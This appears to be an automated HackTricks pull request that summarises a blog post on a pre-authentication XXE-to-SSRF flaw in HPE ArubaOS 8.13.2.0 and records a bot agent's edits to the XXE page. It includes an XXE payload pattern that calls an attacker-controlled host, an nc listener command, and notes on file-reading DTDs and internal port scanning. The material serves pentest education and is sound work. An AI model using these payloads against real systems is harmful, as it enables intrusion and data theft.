Pre-authentication XXE to OOB SSRF in HPE ArubaOS 8.13.2.0 X...

[carlospolop]

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

• Blog URL: https://netacoding.com/posts/xxe-ssrf
• Blog Title: Pre-authentication XXE to OOB SSRF in HPE ArubaOS 8.13.2.0 XML API
• Suggested Section: Pentesting Web -> XXE - XEE - XML External Entity and SSRF; optionally Network Services Pentesting -> 80,443 - Pentesting Web Methodology as an HPE ArubaOS XML API note

🎯 Content Summary

Overview

The post documents a claimed pre-authentication XML External Entity (XXE) vulnerability leading to Out-of-Band (OOB) Server-Side Request Forgery (SSRF) in HPE Aruba Networking Wireless AOS-8 Controller. The tested target was ArubaOS 8.13.2.0 LSR, Build 95415, compiled on 2026-03-25, running on model ArubaMC-VA-US. The affected endpoint is http://<device...

🔧 Technical Details

Blind XXE to OOB SSRF: If an XML parser accepts attacker-controlled DOCTYPE declarations and resolves SYSTEM external entities, an attacker can define an entity pointing to an attacker-controlled HTTP listener and place the entity reference inside a parsed XML element. Example pattern: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<attacker>:9999/test">]> followed by <opcode>&xxe;</opcode>. When the XML is parsed, the server performs an outbound request to the attacker. A listener such as nc -lvp 9999 can capture the callback and prove server-side entity resolution even when the application response does not include the fetched content.

External DTD resolution for blind XXE testing: If a parser fetches external DTDs, the attacker can host the XXE logic in an external file. The shown DTD uses parameter entities: %file reads fi...

🤖 Agent Actions

Done.

Updated:

• src/pentesting-web/xxe-xee-xml-external-entity.md

Added:

• direct OOB XXE → SSRF callback pattern
• external DTD fetches as blind proof
• localhost/internal port scanning via XXE SSRF
• protocol-confusion logs like sshd “Bad protocol version identification” as strong SSRF evidence
• references to the blog and related GitHub repo

Validation:

• confirmed the new section and references were written correctly
• mdbook build could not be run because mdbook is not installed in this environment

---

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

[carlospolop]

🔗 Additional Context

Original Blog Post: https://netacoding.com/posts/xxe-ssrf

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> XXE - XEE - XML External Entity and SSRF; optionally Network Services Pentesting -> 80,443 - Pentesting Web Methodology as an HPE ArubaOS XML API note".

Repository Maintenance:

• MD Files Formatting: 977 files processed

Review Notes:

• This content was automatically processed and may require human review for accuracy
• Check that the placement within the repository structure is appropriate
• Verify that all technical details are correct and up-to-date
• All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0